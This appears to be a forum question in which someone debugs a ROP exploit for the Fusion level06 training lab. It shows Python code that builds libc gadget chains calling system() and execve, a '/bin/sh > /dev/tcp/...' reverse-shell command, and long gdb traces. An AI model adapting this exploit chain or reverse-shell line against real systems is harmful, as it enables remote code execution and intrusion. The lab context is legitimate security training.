# exploit exercise fusion level06, system command not opening reverse shell?

Tags: c, linux, reverse-engineering, exploit, shellcode

I am trying exploit exercise level06 and now i am really very confused.

My exploit script is successfully leaking right libc address. and even, calling __libc_system command with right argument but still nothing happining.

**Breakpoint in __libc_system function**

```
Breakpoint 4, __libc_system (line=0xb7718100 "/bin/sh > /dev/tcp/127.0.0.1/1337 0>&1 2>&1 ")
    at ../sysdeps/posix/system.c:179
179 ../sysdeps/posix/system.c: No such file or directory.
    in ../sysdeps/posix/system.c
```

So, According to above gdb output, My Exploit Is Calling __libc_system and also passing write arguments.
But still, Nothing. (Note : Thread also not exit or terminating. Nothing Just waiting)

**Piece Of Payload Codes**

```
def writethroughpayload(libc, base, data):
    data = re.findall('....', data)
    gt =  libc + 0x000e0097 # pop %ecx | pop %ebx | ret
    gt2 = libc + 0x000238df # pop %eax | ret
    gt3 = libc + 0x0006cc5a # mov %eax,(%ecx) | ret
    p = ''
    for n, i in enumerate(data):
        print '[+] Number {} Data {}'.format(n*4, i)
        p += pack("<I", gt) # pop %ecx | pop %ebx | ret
            p += pack("<I", base+(n*4)) # @ .data + 4
        p += pack("<I", 0x42424242) # padding
        p += pack("<I", gt2) # pop %eax | ret
        p += i
        p += pack("<I", gt3) # mov %eax,(%ecx) | ret
    p += pack("<I", libc + 0x000328e0) # xor %eax,%eax | ret

    return p


# Open bind shell : port 1337
def openncshell(libcbase):
    data = 0x176000 + 0x2000+ 0x1000+0x100
    # Because Of Some Error. Here, I am print every single payload bytes
    p = writethroughpayload(libcbase, libcbase+data, CMD) 
    p += pack("<I", libcbase + 0x000238df) # pop %eax | ret
    p += pack("<I", libcbase+data)
    p += pack("<I", libcbase +  0x0003cb20) # system()
    p += pack("<I", libcbase + 0x000329e0) # exit()
    p += pack("<I", libcbase + data)*3 # @ .data
    p += '\xcc'*12
    return p


def exploit(libc):
    # Payload
    # EIP = 60
    # EDI = 52
    # ESI = 48
    # EBP = 56
    # EBX  = 44
    payload = 'N'*28  # Paddings
    payload += pack('I', libc+0x17600+0x3000+0x150)
    payload += 'N'*12
    payload += 'JJJJ' # EBX
    payload += 'KKKK' # ESI
    payload += 'LLLL' # EDI
    payload += 'MMMM' # EBP
    payload += pack("I", libc + 0x000e0097) # EIP = pop %ecx | pop %ebx | ret)
    #payload += openncshell(libc) # EIP
    # Got Control Over 
    # EAX = EAX - 
    # EDX = 64 Offset 
    # ESI = 64 Offset
    #  mov    eax,DWORD PTR [esi+0x55c]
    payload += struct.pack('I', (libc + 0x0003cb20)-0x55c) # 64 System
    payload += 'BBBB'
    payload += openncshell(libc)


    return payload
```

**GDB Output**

```
(gdb) shell
root@fusion:~# netstat -p -l | grep level06
root@fusion:~# netstat -p -l | grep level06
root@fusion:~# netstat -p -l | grep level06
root@fusion:~# /opt/fusion/bin/level06
root@fusion:~# netstat -p -l | grep level06
tcp        0      0 *:20006                 *:*                     LISTEN      4608/level06    
root@fusion:~# exit
exit
(gdb) attach 4608
Attaching to program: /opt/fusion/bin/level06, process 4608
Reading symbols from /usr/lib/libHX.so.27...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libHX.so.27
Reading symbols from /usr/lib/i386-linux-gnu/libgnutls.so.26...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/i386-linux-gnu/libgnutls.so.26
Reading symbols from /lib/i386-linux-gnu/libpthread.so.0...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libpthread-2.13.so...done.
[Thread debugging using libthread_db enabled]
done.
Loaded symbols for /lib/i386-linux-gnu/libpthread.so.0
Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/i386-linux-gnu/libgcrypt.so.11...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/libgcrypt.so.11
Reading symbols from /lib/i386-linux-gnu/libdl.so.2...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libdl-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libdl.so.2
Reading symbols from /usr/lib/i386-linux-gnu/libtasn1.so.3...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/i386-linux-gnu/libtasn1.so.3
Reading symbols from /lib/i386-linux-gnu/libz.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/libz.so.1
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/i386-linux-gnu/libgpg-error.so.0...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/libgpg-error.so.0
eax            0xfffffe00   -512
ecx            0xbfd68200   -1076461056
edx            0xb78293bc   -1216179268
ebx            0x5  5
esp            0xbfd681e8   0xbfd681e8
ebp            0xbfd68268   0xbfd68268
esi            0x0  0
edi            0xbfd68234   -1076461004
eip            0xb7804424   0xb7804424 <__kernel_vsyscall+16>
eflags         0x293    [ CF AF SF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
=> 0xb7804424 <__kernel_vsyscall+16>:   pop    ebp
   0xb7804425 <__kernel_vsyscall+17>:   pop    edx
   0xb7804426 <__kernel_vsyscall+18>:   pop    ecx
   0xb7804427 <__kernel_vsyscall+19>:   ret    
   0xb7804428:  add    BYTE PTR [esi],ch
0xb7804424 in __kernel_vsyscall ()
(gdb) b *__libc_system
Breakpoint 4 at 0xb75dbb20: file ../sysdeps/posix/system.c, line 179.
(gdb) c
Continuing.
[New Thread 0xb5ce3b70 (LWP 4629)]
[Switching to Thread 0xb5ce3b70 (LWP 4629)]
eax            0xb7718100   -1217298176
ecx            0xb7718128   -1217298136
edx            0xb75db5c4   -1218595388
ebx            0x42424242   1111638594
esp            0xb5ce325c   0xb5ce325c
ebp            0x4d4d4d4d   0x4d4d4d4d
esi            0x4b4b4b4b   1263225675
edi            0x4c4c4c4c   1280068684
eip            0xb75dbb20   0xb75dbb20 <__libc_system>
eflags         0x246    [ PF ZF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
=> 0xb75dbb20 <__libc_system>:  sub    esp,0x10
   0xb75dbb23 <__libc_system+3>:    mov    DWORD PTR [esp+0x8],esi
   0xb75dbb27 <__libc_system+7>:    mov    esi,DWORD PTR [esp+0x14]
   0xb75dbb2b <__libc_system+11>:   mov    DWORD PTR [esp+0x4],ebx
   0xb75dbb2f <__libc_system+15>:   call   0xb76acb63 <__i686.get_pc_thunk.bx>

Breakpoint 4, __libc_system (line=0xb7718100 "/bin/sh > /dev/tcp/127.0.0.1/1337 0>&1 2>&1 ")
    at ../sysdeps/posix/system.c:179
179 ../sysdeps/posix/system.c: No such file or directory.
    in ../sysdeps/posix/system.c
(gdb) 
Continuing.
^C
Program received signal SIGINT, Interrupt.
[Switching to Thread 0xb74e7a70 (LWP 4608)]
eax            0xfffffe00   -512
ecx            0xbfd68200   -1076461056
edx            0xb78293bc   -1216179268
ebx            0x5  5
esp            0xbfd681e8   0xbfd681e8
ebp            0xbfd68268   0xbfd68268
esi            0x0  0
edi            0xbfd68234   -1076461004
eip            0xb7804424   0xb7804424 <__kernel_vsyscall+16>
eflags         0x293    [ CF AF SF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
=> 0xb7804424 <__kernel_vsyscall+16>:   pop    ebp
   0xb7804425 <__kernel_vsyscall+17>:   pop    edx
   0xb7804426 <__kernel_vsyscall+18>:   pop    ecx
   0xb7804427 <__kernel_vsyscall+19>:   ret    
   0xb7804428:  add    BYTE PTR [esi],ch
```

In this Weird situation after loosing my hope. I tried to explore every single Instruction and found this at last

```
(gdb) 
eax            0xf0 240
ecx            0x80 128
edx            0x2  2
ebx            0xb76b8100   -1217691392
esp            0xb2c7d0f4   0xb2c7d0f4
ebp            0x4d4d4d4d   0x4d4d4d4d
esi            0x0  0
edi            0xb2c7d1a0   -1295527520
eip            0xb77a4415   0xb77a4415 <__kernel_vsyscall+1>
eflags         0x246    [ PF ZF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
=> 0xb77a4415 <__kernel_vsyscall+1>:    push   edx
   0xb77a4416 <__kernel_vsyscall+2>:    push   ebp
   0xb77a4417 <__kernel_vsyscall+3>:    mov    ebp,esp
   0xb77a4419 <__kernel_vsyscall+5>:    sysenter 
   0xb77a441b <__kernel_vsyscall+7>:    nop
0xb77a4415 in __kernel_vsyscall ()
(gdb) 
eax            0xf0 240
ecx            0x80 128
edx            0x2  2
ebx            0xb76b8100   -1217691392
esp            0xb2c7d0f0   0xb2c7d0f0
ebp            0x4d4d4d4d   0x4d4d4d4d
esi            0x0  0
edi            0xb2c7d1a0   -1295527520
eip            0xb77a4416   0xb77a4416 <__kernel_vsyscall+2>
eflags         0x246    [ PF ZF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
=> 0xb77a4416 <__kernel_vsyscall+2>:    push   ebp
   0xb77a4417 <__kernel_vsyscall+3>:    mov    ebp,esp
   0xb77a4419 <__kernel_vsyscall+5>:    sysenter 
   0xb77a441b <__kernel_vsyscall+7>:    nop
   0xb77a441c <__kernel_vsyscall+8>:    nop
0xb77a4416 in __kernel_vsyscall ()
(gdb) 
eax            0xf0 240
ecx            0x80 128
edx            0x2  2
ebx            0xb76b8100   -1217691392
esp            0xb2c7d0ec   0xb2c7d0ec
ebp            0x4d4d4d4d   0x4d4d4d4d
esi            0x0  0
edi            0xb2c7d1a0   -1295527520
eip            0xb77a4417   0xb77a4417 <__kernel_vsyscall+3>
eflags         0x246    [ PF ZF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
=> 0xb77a4417 <__kernel_vsyscall+3>:    mov    ebp,esp
   0xb77a4419 <__kernel_vsyscall+5>:    sysenter 
   0xb77a441b <__kernel_vsyscall+7>:    nop
   0xb77a441c <__kernel_vsyscall+8>:    nop
   0xb77a441d <__kernel_vsyscall+9>:    nop
0xb77a4417 in __kernel_vsyscall ()
(gdb) 
eax            0xf0 240
ecx            0x80 128
edx            0x2  2
ebx            0xb76b8100   -1217691392
esp            0xb2c7d0ec   0xb2c7d0ec
ebp            0xb2c7d0ec   0xb2c7d0ec
esi            0x0  0
edi            0xb2c7d1a0   -1295527520
eip            0xb77a4419   0xb77a4419 <__kernel_vsyscall+5>
eflags         0x246    [ PF ZF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
=> 0xb77a4419 <__kernel_vsyscall+5>:    sysenter 
   0xb77a441b <__kernel_vsyscall+7>:    nop
   0xb77a441c <__kernel_vsyscall+8>:    nop
   0xb77a441d <__kernel_vsyscall+9>:    nop
   0xb77a441e <__kernel_vsyscall+10>:   nop
0xb77a4419 in __kernel_vsyscall ()
```

In Simple words, Program automatically stuck in kernel syscall instruction.

Please Check Below Provided Pastebin link and Scroll Down to Last.

[PasteBin Link](https://pastebin.com/mVFmUR9s)

**

### Another Try.

**

**Exploit**

```
def writethroughpayload(libc, base, data):
    data = re.findall('....', data)
    gt =  libc + 0x000e0097 # pop %ecx | pop %ebx | ret
    gt2 = libc + 0x000238df # pop %eax | ret
    gt3 = libc + 0x0006cc5a # mov %eax,(%ecx) | ret
    p = ''
    for n, i in enumerate(data):
        print '[+] Number {} Data {}'.format(n*4, i)
        p += pack("<I", gt) # pop %ecx | pop %ebx | ret
            p += pack("<I", base+(n*4)) # @ .data + 4
        p += pack("<I", 0x42424242) # padding
        p += pack("<I", gt2) # pop %eax | ret
        p += i
        p += pack("<I", gt3) # mov %eax,(%ecx) | ret
    p += pack("<I", libc + 0x000328e0) # xor %eax,%eax | ret
    p += pack("<I", libc + 0x0014a0df) # inc %ecx | ret
    p += pack("<I", libc + 0x0014a0df) # inc %ecx | ret
    p += pack("<I", libc + 0x0014a0df) # inc %ecx | ret
    p += pack("<I", libc + 0x0014a0df) # inc %ecx | ret
    p += pack("<I", libc + 0x0006cc5a) # mov %eax,(%ecx) | ret
    return p


# Open bind shell : port 1337
def openncshell(libcbase):
    data = 0x176000 + 0x2000 +0x1000+20
    data2 = data + 0x50

    # Because Of Some Error. Here, I am print every single payload bytes
    p = writethroughpayload(libcbase, libcbase+data, '/tmp/hackingworks ') # command
    p += writethroughpayload(libcbase, libcbase+data2, '/bin/touch   ') # name 

    # EBX = filename
    p += pack('<I', libcbase +0x00018f4e) # pop ebx ; ret
    p += pack('<I', libcbase +data2) #--> Filename

    # ECX = Argv EDX = NULL
    p += pack('<I', libcbase +0x2da2b) # pop ecx ; pop edx ; ret
    p += pack('<I', libcbase +data)  # argv
    p += pack('<I', libcbase +data+20) # NULL

    # EAX = 11 + kernel call done
    p += pack('<I', libcbase +0x0002eb8f) # xor eax, eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    p += pack('<I', libcbase +0x00026722) # inc eax ; ret
    #p += '\xcc'*4
    p += pack('<I', libcbase +0x0002dd35) # int 0x80
    print '[+] Want To Check Syscall. Set breakpoint here : ', hex(libcbase +0x0002dd35)

    return p
```

**More Accurate GDB Output**

```
    root@fusion:~# netstat -p -l | grep level06
tcp        0      0 *:20006                 *:*                     LISTEN      3401/level06    
root@fusion:~# exit
exit
(gdb) attach 3401
A program is being debugged already.  Kill it? (y or n) y
--Skip--
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/i386-linux-gnu/libgpg-error.so.0...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/libgpg-error.so.0
eax            0xfffffe00   -512
ecx            0xbfdd9a50   -1075996080
edx            0xb778f3bc   -1216810052
ebx            0x5  5
esp            0xbfdd9a38   0xbfdd9a38
ebp            0xbfdd9ab8   0xbfdd9ab8
esi            0x0  0
edi            0xbfdd9a84   -1075996028
eip            0xb776a424   0xb776a424 <__kernel_vsyscall+16>
eflags         0x293    [ CF AF SF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
=> 0xb776a424 <__kernel_vsyscall+16>:   pop    ebp
   0xb776a425 <__kernel_vsyscall+17>:   pop    edx
   0xb776a426 <__kernel_vsyscall+18>:   pop    ecx
   0xb776a427 <__kernel_vsyscall+19>:   ret    
   0xb776a428:  add    BYTE PTR [esi],ch

    0xb776a424 in __kernel_vsyscall ()
(gdb) b *0xb7532d35
Breakpoint 9 at 0xb7532d35
(gdb) c
Continuing.
[New Thread 0xb5c49b70 (LWP 3416)]
[Switching to Thread 0xb5c49b70 (LWP 3416)]
eax            0xb  11
ecx            0xb767e014   -1217929196
edx            0xb767e028   -1217929176
ebx            0xb767e064   -1217929116
esp            0xb5c49250   0xb5c49250
ebp            0x4d4d4d4d   0x4d4d4d4d
esi            0x4b4b4b4b   1263225675
edi            0x4c4c4c4c   1280068684
eip            0xb7532d35   0xb7532d35 <__restore_rt+5>
eflags         0x202    [ IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
=> 0xb7532d35 <__restore_rt+5>: int    0x80
   0xb7532d37 <__restore_rt+7>: nop
   0xb7532d38 <__restore>:  pop    eax
   0xb7532d39 <__restore+1>:    mov    eax,0x77
   0xb7532d3e <__restore+6>:    int    0x80

Breakpoint 9, <signal handler called>
(gdb) si
Couldn't recognize signal trampoline.
(gdb) c
Continuing.
Cannot find user-level thread for LWP 3416: generic error
(gdb)
```